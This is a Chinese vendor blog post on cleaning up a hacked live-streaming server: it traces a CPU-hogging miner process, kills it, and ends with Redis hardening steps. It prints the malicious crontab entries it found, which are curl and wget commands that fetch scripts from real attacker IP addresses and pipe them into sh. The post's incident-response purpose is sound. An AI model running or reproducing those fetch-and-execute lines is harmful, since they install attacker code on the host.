承载一对一直播源码的服务器被黑后的处理方案

发布来源:云豹科技
发布人:云豹科技
2021-11-08 13:35:19

搭建这一对一直播源码的服务器中,用户信息量众多,一旦被黑,后果难以挽回,比如被植入恶意文件或脚本,造成主机被控制或瘫痪,从而影响正常程序运行,以下是云豹运维团队给出的解决处理方案,仅供参考,祝您尽快处理好问题。

一、 服务器资源超负荷

承载着一对一直播源码的服务器被黑后,通常会很明显的有服务器资源负载超额,例如cpu 或者带宽高负荷

 此时,应先看top进程使用情况


# top
top - 18:10:50 up 196 days, 18:59,  2 users,  load average: 4.47, 4.21, 4.11
Tasks: 163 total,   1 running, 162 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.0 us,  1.6 sy, 98.4 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 16267972 total,   185160 free, 14179644 used,  1903168 buff/cache
KiB Swap:        0 total,        0 free,        0 used.  1689432 avail Mem
Which user (blank for all)
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
16634 root      20   0  541132  50260      0 S 400.0  0.3  78595:40 imWBR1
    1 root      20   0   43296   2364   1112 S   0.0  0.0  52:21.51 systemd

根据CPU使用率排序,可以看到排行第一imWBR1的CPU使用率是400%,它的进程id是16634

根据它的进程查看命令情况

# ps 16634
PID TTY      STAT   TIME COMMAND
16634 ?        Ssl  78597:57 /tmp/imWBR1

可以看到它是从/tmp/imWBR1运行的

那么我们查看该目录下的执行文件

 ls /tmp/
Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>
ddg.2021
hsperfdata_root
mysql.sock
php-cgi.sock
sess_08bs7nf1rl24pem9ve5fbeg5a6

可以看到ddg.2021是绿色的,那么可以肯定它就是该程序的启动命令或者是守护程序

当我kill 16634后 它之后依然会出现在进程中,显然他是杀不死的,因此寻找命令有

ddg.2021会发现它也有一个自己的进程一直在跑

top之后看下

 #top
PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
16634 root      20   0  541132  50260      0 S 399.3  0.3  78613:31 imWBR1
3195 root      20   0 8030128 1.647g      0 S   0.3 10.6  47:12.17 java
10111 root      20   0 1565408  71356    888 S   0.3  0.4 951:29.45 ddg.2021

看到ddg.2021的进程id10111

那么先删除命令脚本,在杀死进程

 rm -f /tmp/ddg.2021
kill -9 10111
kill -9 16634

杀不死的小强

显然它在15分钟后开始自启动了,接着大概在18:37分钟的时候它又开始工作了,重新开启399.7%CPU

进程情况如下

 PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 2791 root      20   0  541148  44416   1000 S 399.7  0.3  40:45.54 imWBR1
 2607 root      20   0  310392   9268   5776 S   0.3  0.1   0:01.14 ddg.2021
 4292 root      20   0   27768   1584    516 S   0.3  0.0  26:33.63 redis-server
 7110 root      20   0  251348  16712   3072 S   0.3  0.1 181:11.61 AliYunDun

而/tmp目录中又出现了ddg.2021,而且还多了imWBR1 

ls /tmp/
ddg.2021
hsperfdata_root
imWBR1

再次删除并杀掉进程

rm -f /tmp/ddg.2021  /tmp/imWBR1
kill -9 2791
kill -9 2607

推测:应该是有定时任务在不停的检测是否程序被杀死了,如果杀死了并且可执行文件也被删除了那么它就会自动下载源程序并且启动执行脚本。

去/var/spool/cron这个文件夹看了下,看看它的定时任务内容

cat  /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

可以看出它有两个定时任务

删除/var/spool/cron下的内容

rm -fr  /var/spool/cron/
 
 
ps -aux|grep ddg
3458  /tmp/ddg.2021
kill -9 3458
 
ps -aux|grep imWBR1
3649  /tmp/imWBR1
kill -9 3649
 
rm -f /tmp/ddg.2021  /tmp/imWBR1

清空/etc/crontab中的定时任务

接着找定时任务,在/etc/crontab找到一个,看ip就觉得有问题

cat /etc/crontab
REDIS0006▒cccccc@O
*/1 * * * * /usr/bin/curl -fsSLk 'http://104.161.63.57/install.curl' | sh

清空该定时任务

 
echo '' > /etc/crontab

二、 承载一对一直播源码的服务器被黑原因分析:

承载一对一直播源码的服务器中,Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用。

在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号写入 SSH 公钥文件,直接通过 SSH 登录受害服务器,从而获取服务器权限和数据。一旦入侵成功,攻击者可直接添加账号用于 SSH 远程登录控制服务器,给用户的 Redis 运行环境以及 Linux 主机带来安全风险,如删除、泄露或加密重要数据。

三、 建议修复方案

此方案需重启redis才能生效

1、绑定需要访问数据库的IP 
修改 redis.conf 中的 “bind 127.0.0.1” ,改成需要访问此数据库的IP地址。

2、设置访问密码 
在 redis.conf 中找到“requirepass”字段,在后面填上你需要的密码。

3、修改redis服务运行账号 
请以较低权限账号运行redis服务,且禁用该账号的登录权限。

以上就是本文《承载一对一直播源码的服务器被黑后的处理方案》的全部内容,如果您在一对一直播源码搭建过程中遇到被黑问题,可以尝试本文方案进行处理。

声明:
以上内容为云豹科技作者本人原创,未经作者本人同意,禁止转载,否则将追究相关法律责任
立即查看